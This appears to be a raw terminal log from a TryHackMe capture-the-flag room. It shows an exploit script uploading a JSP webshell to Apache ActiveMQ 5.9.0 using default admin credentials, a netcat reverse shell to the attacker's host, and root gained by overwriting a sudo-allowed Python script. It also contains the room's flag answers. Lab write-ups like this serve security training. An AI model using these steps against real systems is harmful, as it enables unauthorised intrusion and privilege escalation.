*After nmap scan and web directory

root@ip-10-10-37-146:~/Desktop# python3 s.py 10.10.72.32 8161 admin admin 10.10.37.146 1234
Developed by @cyberaguiar - www.cyberaguiar.com
-----------------------------------------------------------------------
** Disclaimer **
-----------------------------------------------------------------------
The developer of this script are not responsible for any misuse of this
exploit we only encourage the ethical use of this script and to be used
only when authorised to do so during an penetration test or similar. Any
damages or misuse of this script is the responsibility of the individuals
who use them unethically or with the intent to damage property.
-----------------------------------------------------------------------

Open other terminal window, execute command below and hit enter to continue:
nc -nvlp 1234
Bursting the absolute path
Absolute path is: /opt/apache-activemq-5.9.0/webapps
Sending payload to http://10.10.72.32/fileserver/webshell.jsp
Moving payload to /opt/apache-activemq-5.9.0/webapps/admin/webshell.jsp
Payload installed at http://10.10.72.32:8161/admin/webshell.jsp
root@ip-10-10-37-146:~/Desktop# 




root@ip-10-10-37-146:~/Desktop# hostname -i
10.10.37.146
root@ip-10-10-37-146:~/Desktop# nc -nvlp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from 10.10.72.32 60218 received!

python3 -c "import pty;pty.spawn('/bin/bash')"; export TERM=xterm
activemq@activemq:/opt/apache-activemq-5.9.0$ ls -l
ls -l
total 9968
-rw-r--r-- 1 activemq activemq    40580 Oct 14  2013 LICENSE
-rw-r--r-- 1 activemq activemq     3334 Oct 14  2013 NOTICE
-rw-r--r-- 1 activemq activemq     2610 Oct 14  2013 README.txt
-rwxr-xr-x 1 activemq activemq 10105484 Oct 14  2013 activemq-all-5.9.0.jar
drwxr-xr-x 1 activemq activemq     4096 Dec 25 18:17 bin
-rw-rw-r-- 1 activemq activemq     1443 Dec 25 17:50 chat.py
drwxr-xr-x 1 activemq activemq     4096 Dec 25 18:16 conf
drwxr-xr-x 1 activemq activemq     4096 Dec 26 04:45 data
-rw-r--r-- 1 activemq activemq       23 Dec 25 18:16 flag.txt
drwxr-xr-x 1 activemq activemq     4096 Dec 25 18:16 lib
-r-x------ 1 activemq activemq      143 Dec 25 17:50 start.sh
-rw-rw-r-- 1 activemq activemq      768 Dec 25 17:50 subscribe.py
drwxr-sr-x 5 activemq activemq     4096 Apr 14 09:45 tmp
drwxr-xr-x 1 activemq activemq     4096 Dec 25 18:17 webapps
activemq@activemq:/opt/apache-activemq-5.9.0$ cat flag.txt
cat flag.txt
THM{you_got_a_m3ss4ge}
activemq@activemq:/opt/apache-activemq-5.9.0$ cat README.TXT
cat README.TXT
cat: README.TXT: No such file or directory
activemq@activemq:/opt/apache-activemq-5.9.0$ python chat.py
python chat.py
bash: python: command not found
activemq@activemq:/opt/apache-activemq-5.9.0$ ./chat.py
./chat.py
bash: ./chat.py: Permission denied
activemq@activemq:/opt/apache-activemq-5.9.0$ cat chat.py
cat chat.py
import paho.mqtt.client as mqtt
import time

def on_connect(client, userdata, flags, rc):
	
	if rc == 0:
		print("Successfully connected to broker {0}, publishing to topic '{1}' now".format(hostname,topic))
		
	else:
		print("Could not connect to broker {0}".format(hostname))

def on_disconnect(client, userdata, rc):

	if rc != 0:
		print("Unexpected disconnection from host {}".format(hostname))
	print("Disconnected from host{}".format(hostname))


topic = "secret_chat"
hostname = "localhost"
port = 1883

client = mqtt.Client(client_id="wergieweuffe123530t", protocol=mqtt.MQTTv31, clean_session=True)
client.on_connect = on_connect
client.on_disconnect = on_disconnect
client.connect(hostname, port, 60)
client.loop_start()
while True:
	client.publish(topic, payload="Paul: Hey, have you played the videogame 'Hacknet' yet?",qos=2, retain=False)
	time.sleep(10)
	client.publish(topic, payload="Max: Yeah, honestly that's the one game that got me into hacking, since I wanted to know how hacking is 'for real', you know? ;)",qos=2, retain=False)
	time.sleep(10)
	client.publish(topic, payload="Paul: Sounds awesome, I will totally try it out then ^^",qos=2, retain=False)
	time.sleep(10)
	client.publish(topic, payload="Max: Nice! Gotta go now, the boss will kill us if he sees us chatting here at work. This broker is not meant to be used like that lol. See ya!",qos=2, retain=False)
	time.sleep(20)
activemq@activemq:/opt/apache-activemq-5.9.0$ sudo  -l
sudo  -l
Matching Defaults entries for activemq on activemq:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User activemq may run the following commands on activemq:
    (root) NOPASSWD: /usr/bin/python3.7 /opt/apache-activemq-5.9.0/subscribe.py
activemq@activemq:/opt/apache-activemq-5.9.0$ echo "import pty;pty.spawn('/bin/bash')" > /opt/apache-activemq-5.9.0/subscribe.py
<n/bash')" > /opt/apache-activemq-5.9.0/subscribe.py
activemq@activemq:/opt/apache-activemq-5.9.0$ sudo /usr/bin/python3.7 /opt/apache-activemq-5.9.0/subscribe.py
<n/python3.7 /opt/apache-activemq-5.9.0/subscribe.py
root@activemq:/opt/apache-activemq-5.9.0# ls
ls
LICENSE  README.txt		 bin	  conf	flag.txt  start.sh	tmp
NOTICE	 activemq-all-5.9.0.jar  chat.py  data	lib	  subscribe.py	webapps
root@activemq:/opt/apache-activemq-5.9.0# ls -l
ls -l
total 9968
-rw-r--r-- 1 activemq activemq    40580 Oct 14  2013 LICENSE
-rw-r--r-- 1 activemq activemq     3334 Oct 14  2013 NOTICE
-rw-r--r-- 1 activemq activemq     2610 Oct 14  2013 README.txt
-rwxr-xr-x 1 activemq activemq 10105484 Oct 14  2013 activemq-all-5.9.0.jar
drwxr-xr-x 1 activemq activemq     4096 Dec 25 18:17 bin
-rw-rw-r-- 1 activemq activemq     1443 Dec 25 17:50 chat.py
drwxr-xr-x 1 activemq activemq     4096 Dec 25 18:16 conf
drwxr-xr-x 1 activemq activemq     4096 Dec 26 04:45 data
-rw-r--r-- 1 activemq activemq       23 Dec 25 18:16 flag.txt
drwxr-xr-x 1 activemq activemq     4096 Dec 25 18:16 lib
-r-x------ 1 activemq activemq      143 Dec 25 17:50 start.sh
-rw-rw-r-- 1 activemq activemq       34 Apr 14 09:53 subscribe.py
drwxr-sr-x 5 activemq activemq     4096 Apr 14 09:45 tmp
drwxr-xr-x 1 activemq activemq     4096 Dec 25 18:17 webapps
root@activemq:/opt/apache-activemq-5.9.0# cd root
cd root
bash: cd: root: No such file or directory
root@activemq:/opt/apache-activemq-5.9.0# cd ..
cd ..
root@activemq:/opt# cd ..
cd ..
root@activemq:/# ls
ls
bin   dev  home  lib64	mnt  proc  run	 srv  tmp  var
boot  etc  lib	 media	opt  root  sbin  sys  usr
root@activemq:/# cd root
cd root
root@activemq:~# ls
ls
root.txt
root@activemq:~# cat root.txt
cat root.txt
THM{br34k_br0k3_br0k3r}
root@activemq:~# 
